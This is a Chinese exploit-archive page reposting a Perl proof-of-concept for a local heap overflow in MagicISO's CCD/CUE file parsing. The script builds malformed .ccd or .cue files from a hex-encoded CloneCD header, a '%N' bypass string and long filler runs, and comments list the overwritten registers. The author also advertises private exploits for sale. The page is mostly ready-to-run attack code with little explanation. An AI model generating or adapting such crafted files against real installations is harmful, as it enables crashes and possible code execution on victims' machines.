首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MagicISO CCD/Cue Local Heap Overflow Exploit PoC
来源:www.vfcocus.net 作者:Stack 发布时间:2009-04-17  

#!/usr/bin/perl
#
# MagicISO CCD/Cue Local Heap Overflow Exploit Poc
# ----------------------------------------------------------------
# Mountassif Moad
# Stack ..
# Cyber-Zone ..
#
# Private exploits for Kayako, contact me if anyone want buy it :d
#
# WARNING: Author has no responsibility over the damage done
# Probably impossible to exploit, but who knows? -_-'
# Regiter for ccd
# EAX 44444141
# ECX 45459090
# EDX 90904443
# EBX 4545A094
# ESP 0012F3A0
# EBP 0012F3C4
# ESI 013AE64C
# EDI 013AF650
# EIP 005C04CE MagicISO.005C04CE
# Rgister for cue
# EAX 0012F5D4
# ECX 013B0000
# EDX 013ADDFC ASCII "FILE "999Ax%N%N%N%N%N%N%N08495d565ef66e7dff9f98764daAAAAAAAAAAAAAA...."
# EBX 00001241 EBc overwrited 41
# ESP 0012F4D8
# EBP 0012F4E4
# ESI 00001200
# EDI 00000000
# EIP 0047FE91 MagicISO.0047FE91
# Crash
sub help {print "[!] usage :   \n    perl $0 .cpp \n    perl $0 .cue \n  " ;exit();}
&help
unless $ARGV[0];
my $xpl = $ARGV[0];
my $header = 
            "\x5B\x43\x6C\x6F\x6E\x65\x43\x44\x5D\x0D\x0A\x56\x65\x72\x73\x69".
            "\x6F\x6E\x3D\x33\x0D\x0A\x5B\x44\x69\x73\x63\x5D\x0D\x0A\x54\x6F".
            "\x63\x45\x6E\x74\x72\x69\x65\x73\x3D\x34\x0D\x0A\x53\x65\x73\x73".
            "\x69\x6F\x6E\x73\x3D\x31\x0D\x0A\x44\x61\x74\x61\x54\x72\x61\x63".
            "\x6B\x73\x53\x63\x72\x61\x6D\x62\x6C\x65\x64\x3D\x30\x0D\x0A\x43".
            "\x44\x54\x65\x78\x74\x4C\x65\x6E\x67\x74\x68\x3D\x30\x0D\x0A\x5B".
            "\x53\x65\x73\x73\x69\x6F\x6E\x20\x31\x5D\x0D\x0A\x50\x72\x65\x47".
            "\x61\x70\x4D\x6F\x64\x65\x3D\x31\x0D\x0A\x50\x72\x65\x47\x61\x70".
            "\x53\x75\x62\x43\x3D\x30\x0D\x0A\x5B\x45\x6E\x74\x72\x79\x20\x30".
            "\x5D\x0D\x0A\x53\x65\x73\x73\x69\x6F\x6E\x3D\x31\x0D\x0A\x50\x6F".
            "\x69\x6E\x74\x3D\x30\x78\x61\x30\x0D\x0A\x41\x44\x52\x3D\x30\x78".
            "\x30\x31\x0D\x0A\x43\x6F\x6E\x74\x72\x6F\x6C\x3D\x30\x78\x30\x34".
            "\x0D\x0A\x54\x72\x61\x63\x6B\x4E\x6F\x3D\x30\x0D\x0A\x41\x4D\x69".
            "\x6E\x3D\x30\x0D\x0A\x41\x53\x65\x63\x3D\x30\x0D\x0A\x41\x46\x72".
            "\x61\x6D\x65\x3D\x30\x0D\x0A\x41\x4C\x42\x41\x3D\x2D\x31\x35\x30".
            "\x0D\x0A\x5A\x65\x72\x6F\x3D\x30\x0D\x0A\x50\x4D\x69\x6E\x3D\x31".
            "\x0D\x0A\x50\x53\x65\x63\x3D\x30\x0D\x0A\x50\x46\x72\x61\x6D\x65".
            "\x3D\x30\x0D\x0A\x50\x4C\x42\x41\x3D\x34\x33\x35\x30\x0D\x0A\x5B".
            "\x45\x6E\x74\x72\x79\x20\x31\x5D\x0D\x0A\x53\x65\x73\x73\x69\x6F".
            "\x6E\x3D\x31\x0D\x0A\x50\x6F\x69\x6E\x74\x3D\x30\x78\x61\x31\x0D".
            "\x0A\x41\x44\x52\x3D\x30\x78\x30\x31\x0D\x0A\x43\x6F\x6E\x74\x72".
            "\x6F\x6C\x3D\x30\x78\x30\x34\x0D\x0A\x54\x72\x61\x63\x6B\x4E\x6F".
            "\x3D\x30\x0D\x0A\x41\x4D\x69\x6E\x3D\x30\x0D\x0A\x41\x53\x65\x63".
            "\x3D\x30\x0D\x0A\x41\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x41\x4C".
            "\x42\x41\x3D\x2D\x31\x35\x30\x0D\x0A\x5A\x65\x72\x6F\x3D\x30\x0D".
            "\x0A\x50\x4D\x69\x6E\x3D\x31\x0D\x0A\x50\x53\x65\x63\x3D\x30\x0D".
            "\x0A\x50\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x50\x4C\x42\x41\x3D".
            "\x34\x33\x35\x30\x0D\x0A\x5B\x45\x6E\x74\x72\x79\x20\x32\x5D\x0D".
            "\x0A\x53\x65\x73\x73\x69\x6F\x6E\x3D\x31\x0D\x0A\x50\x6F\x69\x6E".
            "\x74\x3D\x30\x78\x61\x32\x0D\x0A\x41\x44\x52\x3D\x30\x78\x30\x31".
            "\x0D\x0A\x43\x6F\x6E\x74\x72\x6F\x6C\x3D\x30\x78\x30\x34\x0D\x0A".
            "\x54\x72\x61\x63\x6B\x4E\x6F\x3D\x30\x0D\x0A\x41\x4D\x69\x6E\x3D".
            "\x30\x0D\x0A\x41\x53\x65\x63\x3D\x30\x0D\x0A\x41\x46\x72\x61\x6D".
            "\x65\x3D\x30\x0D\x0A\x41\x4C\x42\x41\x3D\x2D\x31\x35\x30\x0D\x0A".
            "\x5A\x65\x72\x6F\x3D\x30\x0D\x0A\x50\x4D\x69\x6E\x3D\x30\x0D\x0A".
            "\x50\x53\x65\x63\x3D\x32\x0D\x0A\x50\x46\x72\x61\x6D\x65\x3D\x33".
            "\x34\x0D\x0A\x50\x4C\x42\x41\x3D\x33\x34\x0D\x0A\x5B\x45\x6E\x74".
            "\x72\x79\x20\x33\x5D\x0D\x0A\x53\x65\x73\x73\x69\x6F\x6E\x3D\x31".
            "\x0D\x0A\x50\x6F\x69\x6E\x74\x3D\x30\x78\x30\x31\x0D\x0A\x41\x44".
            "\x52\x3D\x30\x78\x30\x31\x0D\x0A\x43\x6F\x6E\x74\x72\x6F\x6C\x3D".
            "\x30\x78\x30\x34\x0D\x0A\x54\x72\x61\x63\x6B\x4E\x6F\x3D\x30\x0D".
            "\x0A\x41\x4D\x69\x6E\x3D\x30\x0D\x0A\x41\x53\x65\x63\x3D\x30\x0D".
            "\x0A\x41\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x41\x4C\x42\x41\x3D".
            "\x2D\x31\x35\x30\x0D\x0A\x5A\x65\x72\x6F\x3D\x30\x0D\x0A\x50\x4D".
            "\x69\x6E\x3D\x30\x0D\x0A\x50\x53\x65\x63\x3D\x32\x0D\x0A\x50\x46".
            "\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x50\x4C\x42\x41\x3D\x30\x0D\x0A".
            "\x5B\x54\x52\x41\x43\x4B\x20\x31\x5D\x0D\x0A\x4D\x4F\x44\x45\x3D".
            "\x31\x0D\x0A\x49\x4E\x44\x45\x58\x20\x31\x3D\x39\x39\x39";
  
  
my $header1=   
            "\x46\x49\x4c\x45\x20\x22";
my $header2=
            "\x2e\x42\x49\x4e\x22\x20\x42\x49\x4e\x41\x52\x59\x0d\x0a\x20".
            "\x54\x52\x41\x43\x4b\x20\x30\x31\x20\x4d\x4f\x44\x45\x31\x2f\x32".
            "\x33\x35\x32\x0d\x0a\x20\x20\x20\x49\x4e\x44\x45\x58\x20\x30\x31".
            "\x20\x30\x30\x3a\x30\x30\x3a\x30\x30";
  
my $bypass=
"\x39\x39\x39\x41\x78\x25\x4e\x25\x4e\x25\x4e\x25\x4e\x25\x4e\x25".
"\x4e\x25\x4e\x25\x4e\x25\x4e\x25\x4e\x25\x4e\x25\x25\x4e\x25\x4e".
"\x25\x4e\x25\x4e\x41\x63\x66\x63\x64\x32\x30\x38\x34\x39\x35\x64".
"\x35\x36\x35\x65\x66\x36\x36\x65\x37\x64\x66\x66\x39\x66\x39\x38".
"\x37\x36\x34\x64\x61\x63\x34\x63\x61\x34\x32\x33\x38\x61\x30";
my $edx = "\x43\x43\x43\x43";
my $Bof = "\x41" x 4004;
my $eax = "\x44\x44\x44\x44";
my $Nop = "\x90" x 4;
my $ecx = "\x45\x45\x45\x45";
my $Sop = "\x91" x 20;
my $Hof = "\x46" x 5000;

if ($xpl eq '.ccd')
{open(file,'>Exploit.ccd');print file $header.$bypass.$edx.$Bof.$eax.$Nop.$ecx.$Sop.$Hof;close(file);print "[!] Done \n";}
elsif ($xpl eq '.cue')
{open(file,'>Exploit.cue');print file $header1.$bypass.$edx.$Bof.$eax.$Nop.$ecx.$Sop.$Hof.$header2;close(file);print "[!] Done \n"}
else {&help}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·eLitius 1.0 (manage-admin.php)
·Apache Geronimo Application Se
·Oracle APEX 3.2 Unprivileged D
·The Miniweb webserver suffers
·webSPELL 4.2.0c Bypass BBCode
·Microsoft Media Player (quartz
·Elecard AVC HD Player .XPL Sta
·Microsoft GDI Plugin .png Infi
·Apollo 37zz (M3u File) Local H
·DNS Tools PHP Digger remote co
·Geeklog <= 1.5.2 savepreferenc
·XRDP <= 0.4.1 Remote Buffer Ov
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved